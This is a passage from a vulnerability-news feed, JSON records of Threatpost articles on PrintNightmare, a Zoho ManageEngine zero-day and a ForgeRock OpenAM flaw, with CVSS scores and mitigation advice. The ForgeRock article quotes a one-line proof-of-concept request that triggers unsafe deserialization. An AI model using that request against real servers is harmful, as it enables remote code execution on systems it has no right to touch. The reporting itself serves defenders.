and SMB (139/tcp and 445/tcp) at the firewall level, according to CERT/CC. However, \u201cblocking these ports on a Windows system may prevent expected capabilities from functioning properly, especially on a system that functions as a server,\u201d the center advised.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-07T10:55:02", "type": "threatpost", "title": "Microsoft Releases Emergency Patch for PrintNightmare Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T10:55:02", "id": "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "href": "https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T15:34:54", "description": "A critical security vulnerability in the Zoho ManageEngine ADSelfService Plus platform could allow remote attackers to bypass authentication and have free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nThe issue (CVE-2021-40539) has been actively exploited in the wild as a zero-day, according to the Cybersecurity and Infrastructure Security Agency (CISA).\n\nZoho issued a patch on Tuesday, and CISA [warned that](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) admins should not only apply it immediately, but also ensure in general that ADSelfService Plus is not directly accessible from the internet. The issue affects builds 6113 and below (the fixed version is 6114).\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) solution for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\n\u201cUltimately, this underscores the threat posed to internet-facing applications,\u201d Matt Dahl, principal intelligence analyst for Crowdstrike, [noted](<https://twitter.com/voodoodahl1/status/1435673342925737991>). \u201cThese don\u2019t always get the same attention as exploit docs with decoy content, but the variety of these web-facing services gives actors lots of options.\u201d\n\nThis isn\u2019t Zoho\u2019s first zero-day rodeo. In March 2020, [researchers disclosed](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) a zero-day vulnerability in Zoho\u2019s ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones and more from a central location. The critical bug ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>), with a CVSS score of 9.8) allowed an unauthenticated, remote attacker to gain complete control over affected systems \u2013 \u201cbasically the worst it gets,\u201d researchers said at the time.\n\n## **Authentication Bypass and RCE**\n\nThe issue at hand is an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus, which could lead to remote code execution (RCE), according to Zoho\u2019s [knowledge-base advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>).\n\n\u201cThis vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request,\u201d according to the firm. \u201cThis would allow the attacker to carry out subsequent attacks resulting in RCE.\u201d\n\nEchoing CISA\u2019s assessment, Zoho also noted that \u201cWe are noticing indications of this vulnerability being exploited.\u201d The firm characterized the issue as \u201ccritical\u201d although a CVSS vulnerability-severity rating has not yet been calculated for the bug.\n\nFurther technical details are for now scant (and no public exploit code appears to be making the rounds \u2014 yet), but Dahl noted that the zero-day attacks have been going on for quite some time:\n\n> Observed exploitation of this vuln _before_ CVE-2021-26084 (Atlassian Confluence) which got a lot of attention last week. Some very general observations:\n> \n> 1/ <https://t.co/rIfxxeBlmO>\n> \n> \u2014 Matt Dahl (@voodoodahl1) [September 8, 2021](<https://twitter.com/voodoodahl1/status/1435673338693754886?ref_src=twsrc%5Etfw>)\n\nHowever, he said that the attacks have thus far been highly targeted and limited, and possibly the work of a single (unknown, for now) actor.\n\n\u201cActor(s) appeared to have a clear objective with ability to get in and get out quickly,\u201d he tweeted.\n\nHe also noted similarities to the attacks taking place on Atlassian Confluence instances (CVE-2021-26084), which also started out as limited and targeted. However, in that case, researchers were able to \u201crapidly produce\u201d a PoC exploit, he pointed out, and eventually there was proliferation to multiple targeted-intrusion actors, usually resulting in cryptomining activity ([as seen in](<https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/>) the recent Jenkins attack).\n\nAtlassian Confluence, like AD SelfService Plus, allows centralized cloud access to a raft of sensitive corporate information, being a collaboration platform where business teams can organize their work in one place.\n\n## How to Know if Zoho AD SelfService Plus is Vulnerable\n\nUsers can tell if they\u2019ve been affected by taking a gander at the \\ManageEngine\\ADSelfService Plus\\logs folder to see if the following strings are found in the access log entries:\n\n * /RestAPI/LogonCustomization\n * /RestAPI/Connection\n\nZoho also said that users will find the following files in the ADSelfService Plus installation folder if running a vulnerable version:\n\n * cer in \\ManageEngine\\ADSelfService Plus\\bin folder.\n * jsp in \\ManageEngine\\ADSelfService Plus\\help\\admin-guide\\Reports folder.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T12:58:48", "type": "threatpost", "title": "Zoho ManageEngine Password Manager Zero-Day Gets Fix", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189", "CVE-2021-26084", "CVE-2021-40539"], "modified": "2021-09-09T12:58:48", "id": "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "href": "https://threatpost.com/zoho-password-manager-zero-day-attack/169303/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-19T16:25:33", "description": "Microsoft has warned of yet another vulnerability that\u2019s been discovered in its Windows Print Spooler that can allow attackers to elevate privilege to gain full user rights to a system. The advisory comes on the heels of patching two other remote code-execution (RCE) bugs found in the print service that collectively became known as PrintNightmare.\n\nThe company released [the advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) late Thursday for the latest bug, a Windows Print Spooler elevation-of-privilege vulnerability tracked as [CVE-2021-34481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34481>). Microsoft credited Dragos vulnerability researcher Jacob Baines for identifying the issue.\n\nThe vulnerability \u201cexists when the Windows Print Spooler service improperly performs privileged file operations,\u201d according to Microsoft.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nAttackers who successfully exploit the bug can run arbitrary code with SYSTEM privileges, allowing them to install programs, view, change or delete data, or create new accounts with full user rights, the company said.\n\nTo work around the bug, administrators and users should stop and disable the Print Spooler service, Microsoft said.\n\n## **Slightly Less of a \u2018PrintNightmare\u2019**\n\nThe vulnerability is the latest in a flurry of problems discovered in Windows Print Spooler, but seems slightly less dangerous, as it can only be exploited locally. It rates 7.8 out of 10 on the CVSS vulnerability-severity scale.\n\nIndeed, [Baines told BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-guidance-on-new-windows-print-spooler-vulnerability/>) that while the bug is print driver-related, \u201cthe attack is not really related to PrintNightmare.\u201d Baines plans to disclose more about the little-known vulnerability in [an upcoming presentation](<https://defcon.org/html/defcon-29/dc-29-speakers.html#baines>) at DEF CON in August.\n\nThe entire saga surrounding Windows Print Spooler [began Tuesday, June 30](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), when a proof-of-concept (PoC) for an initial vulnerability in the print service was dropped on GitHub showing how an attacker can exploit the flaw to take control of an affected system.\n\nThe response to the situation soon turned into confusion. Though Microsoft released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) in it its usual raft of [monthly Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>), fixing what it thought was a minor elevation-of-privilege vulnerability, the listing was updated later in the week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, soon after it became clear to many experts that Microsoft\u2019s initial patch didn\u2019t fix the entire problem. The federal government even stepped in last Thursday, when CERT/CC [offered its own mitigation](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>) for PrintNightmare that Microsoft has since adopted \u2014 advising system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print.\n\nTo further complicate matters, Microsoft also last Thursday dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appeared to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527. The company explained that the second bug was similar to the earlier PrintNightmare vulnerability but also its own distinct entity.\n\nEventually, Microsoft last Wednesday [released an emergency cumulative patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>) for both PrintNightmare bugs that included all previous patches as well as protections for CVE-2021-1675 as well as a new fix for CVE-2021-34527.\n\nHowever, that fix also [was incomplete](<https://www.kb.cert.org/vuls/id/383432>), and Microsoft continues to work on further remediations as it also works to patch this latest bug, CVE-2021-34481. In the meantime, affected customers should install the most recent Microsoft updates as well as use the workaround to avoid exploitation, the company said.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T11:57:53", "type": "threatpost", "title": "Microsoft: Unpatched Bug in Windows Print Spooler", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527"], "modified": "2021-07-16T11:57:53", "id": "THREATPOST:A8242348917526090B7A1B23735D5C6C", "href": "https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-06T21:23:56", "description": "The U.S. government has stepped in to offer a mitigation for a critical remote code execution (RCE) vulnerability in the Windows Print Spooler service that may not have been fully patched by Microsoft\u2019s initial effort to fix it.\n\nTo mitigate the bug, [dubbed PrintNightmare](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), the CERT Coordination Center (CERT/CC) has released a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) for CVE-2021-1675 urging system administrations to disable the Windows Print Spooler service in Domain Controllers and systems that do not print, the Cybersecurity Infratructure and Security Administration (CISA) said [in a release](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) Thursday. CERT/CC is part of the Software Engineering Institute, a federally funded research center operated by Carnegie Mellon University.\n\n\u201cWhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>) configured with the NoWarningNoElevationOnInstall option configured,\u201d CERT/CC researchers wrote in the note.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe mitigation is in response to a scenario that unfolded earlier this week when a proof-of-concept (POC) for PrintNightmare was dropped on GitHub on Tuesday. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform. An attacker can use the POC to exploit the vulnerability to take control of an affected system.\n\nIn the meantime, Microsoft Thursday put out a new advisory of its own on PrintNightmare that assigns a new CVE and seems to suggest a new attack vector while attempting to clarify confusion that has arisen over it.\n\nWhile the company originally addressed CVE-2021-1675 in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) as a minor elevation-of-privilege vulnerability, the listing was updated last week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, soon after it became clear to many experts that the patch appears to fail against the RCE aspect of the bug\u2014hence CISA\u2019s offer of another mitigation and Microsoft\u2019s update.\n\n## **Assignment of New CVE?**\n\nRegarding the latter, the company dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) Thursday for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appears to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527.\n\nThe description of the bug sounds like PrintNightmare; indeed, Microsoft acknowledges that it is \u201can evolving situation.\n\n\u201cA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\u201d according to the notice. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nIn a \u201cFAQ\u201d section in the security update, Microsoft attempts to explain CVE-2021-34527\u2019s connection to CVE-2021-1675.\n\n\u201cIs this the vulnerability that has been referred to publicly as PrintNightmare? Yes, Microsoft has assigned CVE-2021-34527 to this vulnerability,\u201d the company wrote.\n\nHowever, the answer to the question \u201cIs this vulnerability related to CVE-2021-1675?\u201d suggests that CVE-2021-34527 is a different issue.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\nMicrosoft goes on to explain that CVE-2021-34527 existed before the June Patch Tuesday updates and that it affects domain controllers in \u201call versions of Windows.\u201d\n\n**\u201c**We are still investigating whether all versions are exploitable,\u201d the company wrote. \u201cWe will update this CVE when that information is evident.\u201d\n\nMicrosoft did not assign a score to CVE-2021-34527, citing its ongoing investigation.\n\n## **Two Vulnerabilities?**\n\nIn retrospect, one security researcher noted to Threatpost when news of PrintNightmare surfaced Tuesday that it was \u201ccurious\u201d that the CVE for the original vulnerability was \u201c-1675,\u201d observing that \u201cmost of the CVEs Microsoft patched in June are -31000 and higher.\u201d\n\n\u201cThis could be an indicator that they have known about this bug for some time, and fully addressing it is not trivial,\u201d Dustin Childs of Trend Micro\u2019s Zero Day Initiative told Threatpost at the time.\n\nNow it appears that perhaps Microsoft was patching only part of a more complex vulnerability. The likely scenario appears to be that there are two bugs in Windows Print Spooler that could offer attackers some kind of exploit chain or be used separately to take over systems.\n\nWhile one flaw may indeed have been addressed in June\u2019s Patch Tuesday update, the other could be mitigated by CERT/CC\u2019s workaround\u2014or could remain to be patched by a future Microsoft update that comes after the company completes its investigation.\n\nThe company\u2019s release Thursday of a new CVE related to PrintNightmare seems to be an initial attempt to clarify the situation, though given its developing nature, it remains a bit hazy for now.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-02T12:21:02", "type": "threatpost", "title": "CISA Offers New Mitigation for PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-07-02T12:21:02", "id": "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "href": "https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-13T19:49:18", "description": "One day after dropping its scheduled August Patch Tuesday update, Microsoft issued a warning about yet another unpatched privilege escalation/remote code-execution (RCE) vulnerability in the Windows Print Spooler that can be filed under the [PrintNightmare umbrella](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>).\n\nThe news comes amid plenty of PrintNightmare exploitation. Researchers from CrowdStrike warned in a [Wednesday report](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) that the operators of the Magniber ransomware quickly weaponized CVE-2021-34527 to attack users in South Korea, with attacks dating back to at least July 13. And Cisco Talos [said Thursday](<https://blog.talosintelligence.com/2021/08/vice-society-ransomware-printnightmare.html>) that the Vice Society gang was seen using CVE-2021-1675 and CVE-2021-34527 to spread laterally across a victim\u2019s network as part of a recent ransomware attack.\n\n\u201cIn technology, almost nothing ages gracefully,\u201d Chris Clements, vice president of solutions architecture and Cerberus security officer at Cerberus Sentinel, told Threatpost. \u201cThe Print Spooler in Windows is proving that rule. It\u2019s likely that the code has changed little in the past decades and likely still bears a striking resemblance to source code that was made public in previous Windows leaks. I\u2019ve heard it said that ransomware gangs might also be referred to as \u2018technical debt collectors,\u2019 which would be funnier if the people suffering most from these vulnerabilities weren\u2019t Microsoft\u2019s customers.\u201d\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe fresh zero-day bug, tracked as CVE-2021-36958, carries a CVSS vulnerability-severity scale rating of 7.3, meaning that it\u2019s rated as \u201cimportant.\u201d Microsoft said that it allows for a local attack vector requiring user interaction, but that the attack complexity is low, with few privileges required.\n\n\u201cA remote code-execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\u201d the computing giant explained in its [Wednesday advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>). \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights.\u201d\n\nThe CERT Coordination Center actually flagged the issue in mid-July, when it warned that a [working exploit](<https://twitter.com/gentilkiwi/status/1416429860566847490>) was available. That proof-of-concept (PoC), issued by Mimikatz creator Benjamin Delpy, comes complete with a video.\n\n> Hey guys, I reported the vulnerability in Dec'20 but haven't disclosed details at MSRC's request. It looks like they acknowledged it today due to the recent events with print spooler.\n> \n> \u2014 Victor Mata (@offenseindepth) [August 11, 2021](<https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw>)\n\nOn Thursday, CERT/CC issued more details on the issue, explaining that it arises from an oversight in signature requirements around the \u201cPoint and Print\u201d capability, which allows users without administrative privileges to install printer drivers that execute with SYSTEM privileges via the Print Spooler service.\n\nWhile Microsoft requires that printers installable via Point are either signed by a WHQL release signature or by a trusted certificate, Windows printer drivers can specify queue-specific files that are associated with the use of the device, which leaves a loophole for malicious actors.\n\n\u201cFor example, a shared printer can specify a CopyFiles directive for arbitrary files,\u201d according to the CERT/CC [advisory](<https://www.kb.cert.org/vuls/id/131152>). \u201cThese files, which may be copied over alongside the digital-signature-enforced printer driver files, are not covered by any signature requirement. Furthermore, these files can be used to overwrite any of the signature-verified files that were placed on a system during printer driver install. This can allow for local privilege escalation to SYSTEM on a vulnerable system.\u201d\n\nMicrosoft credited Victor Mata of FusionX at Accenture Security with originally reporting the issue, which Mata said occurred back in December 2020:\n\n> Hey guys, I reported the vulnerability in Dec\u201920 but haven\u2019t disclosed details at MSRC\u2019s request. It looks like they acknowledged it today due to the recent events with print spooler.\n> \n> \u2014 Victor Mata (@offenseindepth) [August 11, 2021](<https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw>)\n\nSo far, Microsoft hasn\u2019t seen any attacks in the wild using the bug, but it noted that exploitation is \u201cmore likely.\u201d With a working exploit in circulation, that seems a fair assessment.\n\n## **Print Spooler-Palooza and the PrintNightmare **\n\nDelpy characterized this latest zero-day as being part of the string of Print Spooler bugs collectively known as PrintNightmare.\n\nThe bad dream started in early July, when a PoC exploit for a bug tracked as CVE-2021-1675 was [dropped on GitHub](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>). The flaw was originally addressed in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) from Microsoft as a minor elevation-of-privilege vulnerability, but the PoC showed that it\u2019s actually a critical Windows security vulnerability that can be used for RCE. That prompted Microsoft to issue a different CVE number \u2013 in this case, CVE-2021-34527 \u2013 to designate the RCE variant, and it prompted [an emergency partial patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>), too.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote in the advisory at the time. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\nBoth bugs \u2013 which are really just variants of a single issue \u2013 are collectively known as PrintNightmare. The PrintNightmare umbrella expanded a bit later in July, when yet another, [similar bug was disclosed](<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>), tracked as CVE-2021-34481. It remained unpatched until it was finally addressed with [an update](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) issued alongside the [August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>) (which itself detailed three additional Print Spooler vulnerabilities, one critical).\n\n## **How to Protect Systems from Print Spooler Attacks**\n\nAs mentioned, there\u2019s no patch yet for the bug, but users can protect themselves by simply stopping and disabling the Print Spooler service:\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/12073406/Windows-Zero-Day-Workaround.png)\n\nSource: Microsoft.\n\nCERT/CC also said that since public exploits for Print Spooler attacks use the SMB file-sharing service for remote connectivity to a malicious shared printer, blocking outbound connections to SMB resources would thwart some attacks by blocking malicious SMB printers that are hosted outside of the network.\n\n\u201cHowever, Microsoft indicates that printers can be shared via the Web Point-and-Print Protocol, which may allow installation of arbitrary printer drivers without relying on SMB traffic,\u201d according to CERT/CC. \u201cAlso, an attacker local to your network would be able to share a printer via SMB, which would be unaffected by any outbound SMB traffic rules.\u201d\n\nIn its update advisory for CVE-2021-34481, Microsoft also detailed how to amend the default Point and Print functionality, which prevents non-administrator users from installing or updating printer drivers remotely and which could help mitigate the latest zero-day.\n\n![Threatpost Webinar Series ](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/27093135/threatpost-webinar-300x51.jpg)Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T13:19:50", "type": "threatpost", "title": "Microsoft Warns: Another Unpatched PrintNightmare Zero-Day", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-08-12T13:19:50", "id": "THREATPOST:ADA9E95C8FD42722E783C74443148525", "href": "https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-13T12:53:34", "description": "Attackers are actively exploiting a critical, pre-authorization remote-code execution (RCE) vulnerability in the popular Access Management platform from digital identity management firm ForgeRock.\n\nAccess Management, a commercial access-management platform, is based on the [OpenAM](<https://github.com/OpenIdentityPlatform/OpenAM>) open-source access-management platform for web applications. The platform front-ends web apps and remote-access setups in many enterprises.\n\nOn Monday morning, the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/12/critical-forgerock-access-management-vulnerability>) that the vulnerability could enable attackers to execute commands in the context of the current user. The flaw can be found in Access Management versions below 7.0 running on Java 8. That means 6.0.0.x, 6.5.0.x, 6.5.1, 6.5.2.x and 6.5.3, as well as older, unsupported versions are all sitting ducks.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nAlso on Monday, ForgeRock said in an updated [security advisory](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>) that the flaw doesn\u2019t affect Access Management 7 and above. It only impacts a subset of ForgeRock customers who are using older versions of the company\u2019s Access Management product.\n\nAn exploit for the critical vulnerability at the heart of the matter \u2013 [CVE-2021-35464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464>) \u2013 was [first reported](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>) by Michael Stepankin, a researcher for the cybersecurity firm PortSwigger, on June 29. In his report, Stepankin explained that he created a new [Ysoserial deserialization gadget chain](<https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/Click1.java>) specifically for the exploit.\n\nAs [GitHub details](<https://github.com/frohoff/ysoserial>), Ysoserial is a proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. Serialization is a mechanism of converting the state of an object into a byte stream. Deserialization, in turn, is the reverse process: That\u2019s the mechanism whereby the byte stream is used to recreate the actual Java object in memory, used to persist the object.\n\nWithin hours of Stepankin\u2019s post on June 29, ForgeRock released a workaround and advisory to its customers to protect them from the vulnerability. On July 9, the company updated its advisory with a permanent fix.\n\n## What a Dinky PoC\n\nIn his post, Stepankin summed up the flaw as an RCE made possible \u201cthanks to unsafe Java deserialization in the Jato framework used by OpenAM.\u201d The proof of concept (PoC) requires this single GET/POST request for code execution:\n\n> GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object>\n\nHe said that an attacker who crafts such a request can send it to an exposed, remote endpoint in order to pull off RCE.\n\nThe researcher discovered the vulnerability while looking into [OAuth vulnerabilities](<https://threatpost.com/microsoft-warns-oauth-attacks-cloud-app/157331/>). OAuth is an open standard for access delegation, commonly used as a way for people to sign into services without entering a password, by using signed-in status on another, trusted service or website. Examples include the \u201cSign in with Google\u201d or \u201cSign in with Facebook\u201d that many websites use in lieu of asking visitors to create a new account. These \u201cSign in\u201d or \u201cLog in\u201d prompts are called consent prompts.\n\nA year ago, [Microsoft warned](<https://threatpost.com/microsoft-warns-oauth-attacks-cloud-app/157331/>) that during the pandemic, against the backdrop of widespread remote working and the increased use of collaboration apps, attackers were ramping up application-based attacks that exploit OAuth 2.0.\n\nWith the help of a few scripts, Stepankin discovered all servers that respond to the \u201c/well-known/openid-configuration\u201d URI and checked out their configuration. He decided to focus on \u201ctruly impactful\u201d vulnerabilities: Hence, he zeroed in on systems that are either open-source or available to download and decompile. \u201cForgeRock OpenAm was one such system that I found in the bug bounty scope,\u201d he 